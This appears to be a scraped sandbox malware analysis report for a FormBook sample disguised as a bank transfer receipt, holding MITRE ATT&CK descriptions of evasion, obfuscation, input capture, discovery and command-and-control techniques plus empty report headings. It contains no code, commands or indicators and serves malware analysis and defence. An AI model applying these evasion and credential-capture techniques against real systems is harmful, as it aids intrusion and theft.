Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre